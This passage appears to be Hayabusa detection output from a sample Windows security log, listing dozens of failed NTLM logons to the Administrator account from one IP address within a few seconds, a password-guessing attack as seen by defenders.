+00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fuikeQsxlOUVifVj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.824 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ZWdsRJp9fHypPI1d | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.860 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0j0IBX2eZnx99n9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.909 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: YIZ5Knxg0xr0WmDb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.953 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Wuej3f7mEoWmd4SX | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:41.998 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: B0LcCi06ilIhFPwb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.041 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jWsCGgoFmH06rRf4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.093 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bP47JjNKqtYIZPsC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.140 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: mNlWZ9o0xf7bl2d0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.186 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hnPnB2lEN3BSDpXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.228 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dVMyeF9jGuzHkTHg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.269 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: sDKLl3PjW2qrzJGa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.316 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rkllnePSq3NQ5wgC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.359 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: j9qLWgQnR7P9cs7s | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.408 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C1AdU07nzvv7RB2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.452 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cHgiB5SMiQtsl5oD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.499 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 03e7QOn36l0jH35H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.548 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DoJBywV8x8cURwrO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.583 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: SDYGYO6s6g6Dbx8r | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.621 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nUqXpeTNePFyBmCo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.657 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T2h0qJWcbzRe1GSj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.697 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: edsfNOovOl1Ow503 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.740 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cxCC83XLMIJrNMvl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.785 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MzussOcg5ihdrnD0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.841 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 55l4HKICu8x0FpQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.891 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5GmlVWDjZ75tT08G | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.933 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: o6v1DkuFvB04PESQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:42.977 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VTLdNb0XbzXuLi51 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.016 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CSjDYb1BhHC9UTxO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.054 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: V1yLH19VsfLx9BGF | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.096 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: X4AVhjdz9yHsfss0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.133 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bqWLOKaKwS8VBxDj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.181 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EjK8A8DTSYursBzj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.225 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UaDCKPslwRaLBWtH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.274 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: xAvoekviFDSAIgBe | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.310 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3XOmFwh8IamESWCM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.357 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 54GbW769j1x27mrI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.394 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bZSkhwZXc1SSknDT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.435 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 05AuqlN44x7oJGoi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.482 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RQ4A6ReTVTcFCFeN | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.532 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: T7U6i4CMrL0bHouf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.573 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NaeA4uZ6o8BRbzwf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.626 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MEnlL5BHmlCrtk7p | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.669 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: KRNMpwAAaTsyzPfR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.709 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: oBtHQkRWIoq5hfn7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.752 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5pkk9lgqMQ4wxQel | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.801 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yQVan7kRDOlnim50 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.857 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9282GqsC7UiUMbRl | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.892 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 3lj7GjYryW9wjGgS | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:43.990 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MPy4iUy5WBSLUBdy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.041 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0kvD9DEuos8SRrLH | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.085 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NH1EnMG6fTvcz4QR | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.131 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: cqHDXSQn8gkl2LJy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.164 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: RWI9XDDHjs2xcNB7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.210 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zo53mEz6nal5Gxff | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.256 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jtOgC6wqMoNYVxId | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.297 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DdadoJYvD7DYjlSG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.341 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: U1xjdqjT9h0KUqG2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.389 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QfkzZBvO4onYx6JZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.432 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JqY8CvyODDLQV9Ps | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.482 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nPMRIxRVuh13jmZD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.523 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jARkTWdKTfTIwlug | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.567 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Zwhkc71Nfn7QDf7c | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.612 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qsYad9PgEajlYqvo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.649 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: v9YPw0DsspVbrOld | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.696 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wsHpLCOdAOPFM6nD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.732 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OcNytOhGOZKaREL9 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.768 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lc5boBVigHE1ccGA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.819 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BQXg4ZHdBYHyiTTO | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.853 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JebTJzyn91NrpvkD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.888 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8wCE5ypjEU5feEEv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.928 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: OglsROoqX48xm0gJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:44.956 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5bNC9ES3l3KwXPxb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.004 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: byPavQuiscMm7CMW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.042 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: UQESAC3XpxCJJfG5 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.084 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5aYRnzirSj0PNXAE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.116 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 8s9xJ659geFHOlY4 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx +2016-09-19 16:51:45.154 +00:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yBQdyO0diiFixwlx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LogonFailure_WrongPW.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx 